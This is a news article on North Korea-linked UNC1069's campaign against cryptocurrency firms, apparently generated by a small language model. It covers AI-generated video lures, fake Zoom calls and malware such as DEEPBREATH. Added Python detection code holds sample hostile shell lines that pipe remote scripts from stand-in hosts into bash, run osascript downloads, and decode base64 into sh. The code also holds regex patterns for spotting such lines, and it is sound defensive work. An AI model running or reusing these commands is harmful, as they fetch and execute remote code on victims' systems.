Ethical Hacking News
North Korea-linked UNC1069 has been actively targeting Windows and macOS systems with AI-generated video lures to facilitate financial theft from cryptocurrency organizations. This attack employs a range of tactics including compromised Telegram accounts, fake Zoom meetings, and ClickFix-style infection vectors. With the deployment of multiple new malware families, UNC1069 marks a significant expansion in its capabilities as it shifts towards targeting the Web3 industry.
UNC1069, a North Korea-linked threat actor, has been identified as a major player in cryptocurrency cyber espionage. The group uses AI-generated video lures to deceive victims into downloading malware that steals sensitive data from cryptocurrency organizations, including system information and browser credentials. The activity is believed to be financially motivated and is carried out through social engineering schemes.
North Korea-linked threat actor, UNC1069, has been identified as a major player in the world of cryptocurrency cyber espionage. According to recent reports from Google Threat Intelligence Group (GTIG), this North Korean-based group has been actively targeting Windows and macOS systems with the ultimate goal of stealing sensitive data from cryptocurrency organizations.
The group's tactics, techniques, and procedures (TTPs) have evolved over time, incorporating cutting-edge technology such as artificial intelligence (AI) and generative tools to deceive victims. One notable example is the use of AI-generated video lures to spoof legitimate Zoom meetings. This is achieved by compromising Telegram accounts, scheduling fake Zoom meetings using Calendly, and deploying ClickFix-style infection vectors.
The attack typically begins when a victim receives an unsolicited message from a compromised Telegram account or is invited to a fake Zoom meeting link via messages on the same platform. Upon clicking on the link, victims are presented with a fake video call interface that mirrors an actual Zoom meeting. However, this illusion is short-lived as the attackers prompt them to download and run a ClickFix-style troubleshooting command.
This command leads to the delivery of an AppleScript, which in turn drops a malicious Mach-O binary onto the system. The malware is designed to gather system information and distribute additional payloads, including a Go-based downloader codenamed HYPERCALL. This component serves as the primary vector for further payload deployment.
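The ClickFix step described above depends on the victim pasting a "troubleshooting" command into a terminal, so shell history and process-execution logs are a natural place to look for it. The following is an added detection example, not code from the article or from the GTIG/Mandiant report: it scores command lines against generic ClickFix-style indicators (remote content piped into a shell, inline AppleScript via `osascript -e`, base64-decoded payloads, quarantine stripping). The sample history lines and the `example.invalid` hostnames are constructed for the example; the patterns are general heuristics rather than indicators from the campaign.

```python
import re
from typing import Iterable, List, Tuple

# Generic ClickFix-style indicators, each paired with a human-readable reason.
# These are heuristics chosen for this example, not IoCs taken from the report.
INDICATORS: List[Tuple["re.Pattern[str]", str]] = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
     "remote content piped straight into a shell"),
    (re.compile(r"\bosascript\b.*\s-e\b"),
     "inline AppleScript passed to osascript"),
    (re.compile(r"do shell script", re.IGNORECASE),
     "AppleScript that spawns a shell"),
    (re.compile(r"\bbase64\b.*(\s-d\b|--decode)"),
     "base64-decoded payload"),
    (re.compile(r"\b(chmod\s+\+x|xattr\s+-d\s+com\.apple\.quarantine)\b"),
     "marks a downloaded file executable or strips quarantine"),
]

# Constructed sample shell history (not real victim data).
SAMPLE_SHELL_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://updates.example.invalid/zoom-fix.sh | bash",
    "osascript -e 'do shell script \"curl -s https://updates.example.invalid/p -o /tmp/.zm\"'",
    "echo aGVsbG8gd29ybGQ= | base64 -d | sh",
    "git status",
]


def classify_command(cmd: str) -> List[str]:
    """Return the matched indicator reasons for one command line (empty list = nothing flagged)."""
    return [reason for pattern, reason in INDICATORS if pattern.search(cmd)]


def find_suspicious(commands: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Run every command through the indicators and keep only those that matched at least one."""
    hits: List[Tuple[str, List[str]]] = []
    for cmd in commands:
        reasons = classify_command(cmd)
        if reasons:
            hits.append((cmd, reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in find_suspicious(SAMPLE_SHELL_HISTORY):
        print(f"{cmd}\n    -> {', '.join(reasons)}")
```

In practice the input would be `~/.zsh_history`, `~/.bash_history`, or the command-line field of endpoint telemetry; a single match is worth an analyst look, and two or more on one line (such as `osascript -e` together with `do shell script`) is a strong signal.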
Among these payloads are several notable examples, including WAVESHAPER, a C++ executable that gathers system information before distributing HYPERCALL; HIDDENCALL, a Golang backdoor that provides hands-on keyboard access to the compromised system; and DEEPBREATH, a Swift-based data miner that exploits macOS's Transparency, Consent, and Control (TCC) database to gain file system access.
DEEPBREATH is particularly noteworthy for its ability to steal iCloud Keychain credentials as well as data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application. Similarly, CHROMEPUSH, a C++-based browser extension deployed by masquerading as a tool for editing Google Docs offline, comes equipped with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.
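Because DEEPBREATH's file-system reach depends on entries in the macOS TCC database, auditing that database for unexpected grants is a useful post-incident and hunting check. The following is an added example, not code from the article or from the researchers: it audits the `access` table of a TCC.db for allowed grants to sensitive services (Full Disk Access, Accessibility, Screen Recording, Camera) whose client is not on an allowlist. The service names and the `auth_value = 2` meaning "allowed" match modern macOS; the in-memory database, its rows, and the `.helper` path are constructed for the example.

```python
import sqlite3
from typing import Dict, List, Set

# Real TCC service identifiers that matter most for data theft.
SENSITIVE_SERVICES: Dict[str, str] = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceAccessibility": "Accessibility",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceCamera": "Camera",
}
AUTH_ALLOWED = 2       # auth_value meaning "allowed" in modern TCC.db
CLIENT_TYPE_PATH = 1   # client_type 1 = client identified by file path, 0 = bundle ID


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for TCC.db using a subset of the real 'access' columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)"
    )
    rows = [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, 1700000000),
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, 1700000100),
        # Constructed suspicious entry: an unbundled helper in a cache directory holding Full Disk Access.
        ("kTCCServiceSystemPolicyAllFiles", "/Users/alice/Library/Caches/.helper", 1, 2, 2, 1700000200),
        ("kTCCServiceScreenCapture", "com.example.notes", 0, 0, 2, 1700000300),  # denied grant
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", rows)
    return conn


def audit_tcc(conn: sqlite3.Connection, allowlist: Set[str]) -> List[Dict[str, object]]:
    """Return allowed grants for sensitive services whose client is not on the allowlist."""
    findings: List[Dict[str, object]] = []
    cur = conn.execute(
        "SELECT service, client, client_type, last_modified FROM access WHERE auth_value = ?",
        (AUTH_ALLOWED,),
    )
    for service, client, client_type, modified in cur:
        if service not in SENSITIVE_SERVICES or client in allowlist:
            continue
        findings.append({
            "service": SENSITIVE_SERVICES[service],
            "client": client,
            "path_based": client_type == CLIENT_TYPE_PATH,  # path clients are rarer and worth a look
            "last_modified": modified,
        })
    return findings


def audit_file(path: str, allowlist: Set[str]) -> List[Dict[str, object]]:
    """Audit a real TCC.db opened read-only (reading it needs Full Disk Access for the auditing process)."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return audit_tcc(conn, allowlist)
    finally:
        conn.close()


if __name__ == "__main__":
    for finding in audit_tcc(build_sample_db(), {"com.apple.Terminal", "us.zoom.xos"}):
        print(finding)
```

On a real host there are two databases to check: the system one at `/Library/Application Support/com.apple.TCC/TCC.db` and the per-user one at `~/Library/Application Support/com.apple.TCC/TCC.db`; pass each to `audit_file` with the organization's approved bundle identifiers as the allowlist, and treat any path-based Full Disk Access client in a cache or temporary directory as a priority finding.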
The deployment of multiple new malware families alongside SUGARLOADER marks a significant expansion in UNC1069's capabilities. This shift from traditional finance targeting towards Web3 industry targets such as centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds underscores the group's ability to adapt and evolve.
According to Mandiant researchers Ross Inman and Adrian Hernandez, "The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft." This statement highlights the group's relentless pursuit of financial gain through increasingly sophisticated social engineering schemes.
Furthermore, Google Threat Intelligence Group (GTIG) has documented the same campaign under the name GhostCall, which was detailed in October 2025. Kaspersky has also tracked this campaign, with their researchers noting that "Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims."
In conclusion, UNC1069's deployment of AI-generated video lures as a key component of its social engineering campaigns highlights the evolving nature of threat actors' tactics. As such, it is essential for cryptocurrency organizations and individuals to remain vigilant in protecting themselves against these sophisticated schemes.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korea-Linked-UNC1069-Uses-AI-Lures-to-Attack-Cryptocurrency-Organizations-A-Comprehensive-Analysis-ehn.shtml
https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html
https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/
Published: Wed Feb 18 20:07:34 2026 by llama3.2 3B Q4_K_M